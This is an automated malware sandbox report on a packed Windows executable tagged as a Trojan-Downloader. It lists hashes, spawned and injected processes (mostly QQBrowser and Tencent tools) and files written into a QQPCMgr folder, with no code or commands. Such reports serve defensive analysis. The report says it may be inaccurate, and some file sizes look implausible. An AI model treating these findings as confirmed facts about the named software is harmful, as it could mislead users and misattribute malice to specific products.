Trojan-Downloader.Win32.Moure_f533930028
Trojan-Downloader.Win32.Moure.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: f5339300281ab965a05a9ea2accd896c
SHA1: bce712a7db2139afcddcfdd1dbafee333c006f81
SHA256: fec7793a79f63b548e5f1ca4aeaba0bb094549fc1bcf515f9f3f2c9ab03473c9
SSDeep: 49152:GuuE7AnqIxGrGYyZa/tgrYJUGfZC3wA6EylfwEaFWd:IE7AqrlyutLxC3sEwwMd
Size: 2383432 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Sogou.com Inc.
Created at: 2016-04-18 16:10:46
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan-Downloader creates the following process(es):
QQPCMgr_Setup.exe:2796
QQBrowserLiveup.exe:1808
InstAsm.exe:3332
minidownload.exe:1832
MiniTPFw.exe:500
ThunderFW.exe:568
%original file name%.exe:856
QQBrowser.exe:1268
QQBrowser.exe:2328
QQBrowser.exe:2612
QQBrowser.exe:3756
QQBrowser.exe:3532
QQBrowser.exe:2196
QQBrowser.exe:3736
QQBrowser.exe:2944
QQBrowser.exe:3652
QQBrowser.exe:3128
QQBrowser.exe:1968
QQBrowser.exe:3472
QQBrowser.exe:3028
QQBrowser.exe:2888
QQBrowser.exe:1960
QQBrowser.exe:2364
QQBrowser.exe:2852
QQBrowser.exe:2764
QQBrowser.exe:3404
QQBrowser.exe:2836
QQBrowser.exe:2488
QQBrowser.exe:2492
QQBrowser.exe:3032
QQPCDownload8889533.exe:1584
j3lx7ew39.exe:2960
WiFi-2175.exe:664
BrowserProtect18.exe:2432
QQBrowserOTA.exe:2012
ExternalApp.exe:1112
QBDownload.exe:2504
regsvr32.exe:2300
regsvr32.exe:808
regsvr32.exe:3168
TsService.exe:3568
TsService.exe:3448
cacls.exe:3344
SuiteDownloader20160222153349.exe:1488
UpdateService.exe:628
UpdateService.exe:1880
The Trojan-Downloader injects its code into the following process(es):
SogouSoftware.exe:216
MiniThunderPlatform.exe:2060
QQBrowser.exe:3576
QQBrowser.exe:1252
QQBrowser.exe:3600
QQBrowser.exe:2624
QQBrowser.exe:4064
QQBrowser.exe:3504
QQPCTray.exe:3088
QQPCRealTimeSpeedup.exe:4488
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process QQPCMgr_Setup.exe:2796 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_528.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetflowOpti.png (928 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1102.dat (455 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftBaseInfoForFileOpen.etf (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCCommonMgr.rdb (15789 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepProv.dat (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpCheck.dll (4823 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libpng.dll (1215 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\tab_icon_sys_opt_sys_homepage.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCWifiSafe.png (816 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HW_GameScore.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1227.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_949.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicNet.png (883 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMRepairPlugin.dll (1793 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMKCheck\QMKCheck.dll (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libpng.dll (643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\TraceClear.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUAgent.dll (4091 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1099.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeedupjmp\SysSpeedUpJmp.dll (405 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt64.dll (6370 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInstaller.exe (2528 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.rdb (158 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPVulScan\HPVulScan.dll (1029 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\unstag.etf (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMon.dll (6571 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVUpload.dll (4333 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUL.dll (3677 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextScan.dll (1674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1200.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.rdb (317 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.rdb (273 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone_Notify.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQPCLaunch.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetConnect\QMNetConnectDll.dll (1270 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysOptimize.png (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1023.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1002.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\whitelist.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.rdb (97 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLP.dat (688 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOAccelerator.sys (2520 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_691.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCTray.exe (2818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MemDefragWhiteList.etf (211 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMalCoreCfgV1.dat (3714 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\AppMarketPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel64.sys (1025 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQSysMon.sys (2373 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHardware.dll (3699 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.tpc (698 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_571.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_112.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_794.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOPlatform.dll (13792 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.exe (2794 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.rdb (1729 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOLUIControl.dll (5819 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSRunner.DAT (717 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\PrefetchConfig.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp_64.sys (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.rdb (19 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftMgr.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1604.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginInfo.xml (37 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.dat (848 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\softmgr.ico (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssLibHlp.dll (1613 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TxArp6.sys (27 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\Common.dll (28727 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSecScanLib.dll (216 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1034.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1302.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.tpc (676 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle57.png (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xGraphic32.dll (2012 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.rdb (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\DNFConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\libjpegturbo.dll (3859 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Win10ToastNotification.dll (3603 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.tpc (703 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMGameSpeedup.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMinfo.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.rdb (59 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTask.dat (600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (468 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.exe (5831 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcuninstalljump.png (256 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SXComBase.dll (2097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1096.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOVList.etf (411 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.tpc (721 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.rdb (118 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSLogPolicy.dll (1306 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QMNetMonDll.dll (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_898.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\NetMon.png (424 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FilterService.ini (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hptrojanscan\HPTrojanScanInfo.xml (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy (808 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.rdb (79 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\syshomepage.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.exe (8779 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SMobileAssisCfg.etf (323 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\jgImage.dll (716 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_131.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCClinic_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1026.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.rdb (1624 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSService.dll (4987 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1106.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmcp.DAT (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQMobileMgr.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\WebShieldCFG.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbSGList.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMExt.dll (1769 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1016.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1301.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\xpword.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1012.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageClearV2.dat (155 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPInternalScan\HPInternalScan.dll (2208 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.dll (4997 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1500.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1406.dat (969 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMWebFWCfg.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_133.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_352.png (2 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\jsfeature.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.dll (23169 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\Startup.etf (1826 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tscpm.sys (1193 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftPolicy.etf (296 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\zlib.dll (567 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1412.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.exe (6273 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.dat (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\UpdateTrayIcon.exe (2228 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMonPlugin.dll (1642 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSFSEngine.DAT (104 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.tpc (763 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\FIFAConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelEx.sys (2496 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.dll (10652 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_479.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibexcept.xml (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libexpatw.dll (1184 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSuperScan.EXE (1810 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameUpgradeTrayPlugin\GameUpgradeTrayPlugin.dll (3518 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\NetworkFixInfo.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1405.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\Common.dll (20906 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBusinessCfgV2.etf (617 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.dll (9480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileUnlock.dll (33 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1015.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\logodef.ico (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\GFCustom.dll (10350 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_109.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmKit.dll (1889 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.dll (7706 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\DeskUpdate\GlobalMgr.db (190 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\dlcore.dll (17399 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.dll (6276 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSwitchesMgrPlugin\QMSwitchesMgrPlugin.dll (776 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDlder.dll (3807 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\bugreport_xf.exe (3814 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FastUninstScpt.etf (95 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\libjpegturbo.dll (2625 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScan.dll (3412 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileMon\x64\TFsFltX64.sys (953 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xGraphic32.dll (1610 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.rdb (1704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1104.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextUninstall.dll (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib.dat (782 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftGroup.etf (90 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xImage.dll (2088 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ScUrConfig.dat (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DlForQd.dll (3350 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.rdb (6308 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1605.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\More.png (448 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.rdb (1719 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibcss.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\RemoteAssistance.png (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysOptimize\QMTraceClear.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_663.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsskx64.sys (54 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.tpc (686 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1028.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpk.ini (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10483.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libexpatw.dll (1195 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpswscanplugin\HPSWScanPlugin.dll (3480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.dll (2928 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsFltMgr.sys (1770 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_2000.dat (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.tpc (711 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulPage.dll (11307 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMonWfp64.sys (559 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.tpc (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcp80.dll (6658 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.dll (3722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\AVEngine.ini (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\zlib.dll (145 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.rdb (50 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\NewPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libpng.dll (1843 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dll (7875 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.dll (10358 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.rdb (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ProcessManager.dll (3261 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.dll (3119 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMConnectTipsConfig.dat (520 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1227.dat (1 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle71.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOClient.dll (2383 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdBlock.png (653 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\CommonDef.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCSoftMgr.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.dll (8515 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.exe (9760 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_565.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libexpatw.dll (1879 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCBTU.exe (577 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1003.dat (6 bytes)
